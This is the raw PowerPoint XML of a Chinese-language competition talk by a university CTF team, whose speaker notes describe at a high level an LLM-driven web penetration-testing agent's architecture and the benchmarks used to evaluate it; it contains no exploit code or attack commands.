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9" r:id="rId6"/>
    <p:sldId id="258" r:id="rId7"/>
    <p:sldId id="265" r:id="rId8"/>
    <p:sldId id="266" r:id="rId9"/>
    <p:sldId id="278" r:id="rId10"/>
    <p:sldId id="279" r:id="rId11"/>
    <p:sldId id="263" r:id="rId12"/>
    <p:sldId id="267" r:id="rId13"/>
    <p:sldId id="289" r:id="rId14"/>
    <p:sldId id="268" r:id="rId15"/>
    <p:sldId id="281" r:id="rId16"/>
    <p:sldId id="269" r:id="rId17"/>
    <p:sldId id="270" r:id="rId18"/>
    <p:sldId id="284" r:id="rId19"/>
    <p:sldId id="285" r:id="rId20"/>
    <p:sldId id="286" r:id="rId21"/>
    <p:sldId id="274" r:id="rId22"/>
    <p:sldId id="275" r:id="rId23"/>
    <p:sldId id="287" r:id="rId24"/>
    <p:sldId id="276" r:id="rId25"/>
    <p:sldId id="288" r:id="rId26"/>
    <p:sldId id="280" r:id="rId27"/>
    <p:sldId id="264" r:id="rId28"/>
    <p:sldId id="277" r:id="rId29"/>
    <p:sldId id="260" r:id="rId30"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
      <p:regular r:id="rId34"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Calibri" panose="020F0502020204030204" charset="0"/>
      <p:regular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7" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="37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090A"/>
    <a:srgbClr val="180E0A"/>
    <a:srgbClr val="0B2812"/>
    <a:srgbClr val="051D0E"/>
    <a:srgbClr val="112322"/>
    <a:srgbClr val="41285A"/>
    <a:srgbClr val="0DFEE5"/>
    <a:srgbClr val="5B0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217"/>
        <p:guide pos="37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大家好，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>我是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>xjtuHunter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的队长胡宇睿</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>今天我来代表我们战队分享我们的比赛思路</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>答辩的主题是基于场景感知的下一代黑盒渗透方案</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整体的架构如图所示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>首先是页面探索</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>页面的前端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>dom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>元素和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>数据流提取后端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>api</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>接下来由大模型自主建立</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>api</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>间的数据依赖</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>控制依赖与隐式依赖关系</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>抽取出业务场景并设计脆弱请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>最后由漏洞检测器对不同类型的漏洞进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>llm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>引导的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>最终生成漏洞报告</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首先介绍一下整体架构的设计背景</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>核心理念是漏洞存在于业务逻辑的交互中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>而非孤立的代码中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>传统的孤立检测产生的高误报</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>漏洞往往是因为没有理解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>api</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>间的控制依赖和数据依赖关系</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>只对孤立的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>api</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的批量发送与验证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>忽略了</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>我进行一个简单的战队和自我的介绍</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>我们战队是来自西安交通大学网络空间安全学院学生组成的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ctf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>战队</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>我也是西安交通大学网络安全学院的在读博士生</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>研究方向主要是开源安全治理和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>自动化渗透</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>我从事网络安全多年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>有丰富的攻防与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>CTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>赛事经验，同时近期我也在持续做</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>AI+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>安全应用开发</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>多种产品已在联通等企业落地实践</a:t>
            </a:r>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这次的答辩主要分四个部分</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>主要从方法论与实践成果来分享我们的框架思路</a:t>
            </a:r>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首先是经验洞察</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>我将主要分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>AI Agent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>开发的底层逻辑</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正如前段时间姚順宇所言</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>目前</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>行业的发展分为上下半场</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>上半场集中在模型算力和训练数据的比拼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>目的是建立“更大</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>更多</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>更快”的通用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>AI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>大脑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>这一阶段主要是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>头部公司发力</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>具有绝对的资本壁垒</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>那么到了如今的下半场</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在基础设施已经相对成熟时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>市场更关注大模型在各领域中真正实现的价值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>这一阶段需要更多的垂域经验指导</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如何通过架构设计和评估标准让大模型更好地处理复杂的业务逻辑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>此时各细分领域的专家知识比</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>能力更重要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>比如之前一个做量化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>agent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的团队</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>他们请了一个投资界大佬分享了几套公式模版</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>然后根据公式里的指标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>dify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>每天爬股票和隐藏资产</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用公式计算投资倾向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>收益率也相当可观</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>所以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>agent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的核心竞争力还是有没有这个领域里最优秀的经验</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>否则</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>agent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>也只是一个死板的工具调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>链而已</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>。</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那么接下来</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>我们就说下我们是怎么设计渗透</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>agent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>核心思路是像攻击者一样思考</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>当攻击者拿到一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>他会做什么</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>一般都会进行端口扫描</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>页面爬取和当前</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的指纹识别</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>也就是从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>发现更多的资产，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>渗透里就主要是页面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>那有了页面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>比如是一个后台管理系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击者是不是一般都会尝试各种业务功能</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>也就是收集更多的业务逻辑信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>最后根据这些业务逻辑信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使用相应的载荷测试功能脆弱性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>也就是整体流程是一个由点即面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>不断收集信息利用信息的过程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>对于业务场景的理解更深</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>更有可能发现隐蔽的漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a: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有了好的架构</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>还需要一个专业的评估标准</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>对于通用大模型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>常见的评估数据集是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>MMLU，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>其中含有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>116</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>道网络安全相关题目</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>主要模式就是这种选择题</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>可以看得出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>和我们的真实渗透任务还是存在着巨大的鸿沟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>主要来源于静态知识和动态操作的差异</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a: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因此我们需要引入更专业的评估标准</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>比如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>XBOW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>具有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>104</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>道</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ctf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>题</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>涵盖了多种真实漏洞类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，autopenbench，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>主要用来评估多领域知识的覆盖度</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>这些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>benchmark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的核心评估维度主要是侦查覆盖率</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>漏洞检出率与误报率</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>利用成功率</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击链构建能力等更贴近真实渗透的指标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>由此指导我们后续的架构优化方向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>比如通过执行验证</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>反思与记忆和多智能体协同等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <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a:t>
            </a:r>
            <a:r>
